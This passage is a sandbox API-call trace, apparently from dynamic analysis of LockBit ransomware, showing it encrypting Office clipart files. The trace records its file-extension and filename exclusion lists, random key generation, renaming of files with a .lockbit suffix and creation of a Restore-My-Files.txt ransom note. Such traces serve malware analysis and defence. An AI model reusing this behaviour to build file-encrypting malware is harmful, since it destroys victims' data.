Office\\CLIPART\\PUB60COR\\J0199609.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.748] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.748] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.749] free (_Block=0x1fa2ed8) [0150.750] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199609.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.750] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.750] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.751] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66031e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2004, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200151.WMF", cAlternateFileName="")) returned 1 [0150.751] lstrcmpiW (lpString1=".", lpString2="J0200151.WMF") returned -1 [0150.751] lstrcmpiW (lpString1="..", lpString2="J0200151.WMF") returned -1 [0150.751] PathFindExtensionW (pszPath="J0200151.WMF") returned=".WMF" [0150.751] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.751] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.751] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.751] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.751] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.751] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.751] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.751] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.751] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.751] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.752] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.752] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.753] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200151.WMF") returned 1 [0150.753] lstrcmpiW (lpString1="ntldr", lpString2="J0200151.WMF") returned 1 [0150.753] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200151.WMF") returned 1 [0150.753] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200151.WMF") returned -1 [0150.754] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200151.WMF") returned -1 [0150.754] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200151.WMF") returned 1 [0150.754] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200151.WMF") returned -1 [0150.754] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.754] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200151.WMF") returned=".WMF" [0150.754] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.754] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.754] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.755] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.755] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200151.WMF.lockbit") returned 72 [0150.755] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200151.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200151.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0150.760] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.760] malloc (_Size=0x40068) returned 0x3e70008 [0150.760] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=8196) returned 1 [0150.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.761] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0150.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.762] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0150.762] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0150.765] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200151.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200151.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.765] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.766] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.767] free (_Block=0x1fa2ed8) [0150.767] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200151.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.767] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.767] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.767] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56583130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1c0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200163.WMF", cAlternateFileName="")) returned 1 [0150.767] lstrcmpiW (lpString1=".", lpString2="J0200163.WMF") returned -1 [0150.767] lstrcmpiW (lpString1="..", lpString2="J0200163.WMF") returned -1 [0150.767] PathFindExtensionW (pszPath="J0200163.WMF") returned=".WMF" [0150.767] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.767] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.767] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.767] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.767] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.767] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.767] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.768] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.769] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.769] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200163.WMF") returned 1 [0150.769] lstrcmpiW (lpString1="ntldr", lpString2="J0200163.WMF") returned 1 [0150.769] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200163.WMF") returned 1 [0150.770] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200163.WMF") returned -1 [0150.770] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200163.WMF") returned -1 [0150.770] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200163.WMF") returned 1 [0150.770] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200163.WMF") returned -1 [0150.770] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.770] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200163.WMF") returned=".WMF" [0150.770] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.770] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.770] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.771] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.771] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200163.WMF.lockbit") returned 72 [0150.771] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200163.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200163.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0150.776] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.776] malloc (_Size=0x40068) returned 0x1ff1e60 [0150.776] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7180) returned 1 [0150.776] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.777] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0150.777] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.777] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0150.777] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.780] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200163.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200163.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.780] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.780] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.781] free (_Block=0x1fa2ed8) [0150.782] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200163.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.782] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.782] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.782] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66031e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x14c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200183.WMF", cAlternateFileName="")) returned 1 [0150.782] lstrcmpiW (lpString1=".", lpString2="J0200183.WMF") returned -1 [0150.782] lstrcmpiW (lpString1="..", lpString2="J0200183.WMF") returned -1 [0150.782] PathFindExtensionW (pszPath="J0200183.WMF") returned=".WMF" [0150.782] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.782] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.782] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.782] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.782] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.782] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.782] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.782] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.782] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.782] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.782] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.783] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.783] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.784] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200183.WMF") returned 1 [0150.784] lstrcmpiW (lpString1="ntldr", lpString2="J0200183.WMF") returned 1 [0150.784] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200183.WMF") returned 1 [0150.784] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200183.WMF") returned -1 [0150.784] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200183.WMF") returned -1 [0150.784] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200183.WMF") returned 1 [0150.785] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200183.WMF") returned -1 [0150.785] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.785] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200183.WMF") returned=".WMF" [0150.785] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.785] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW 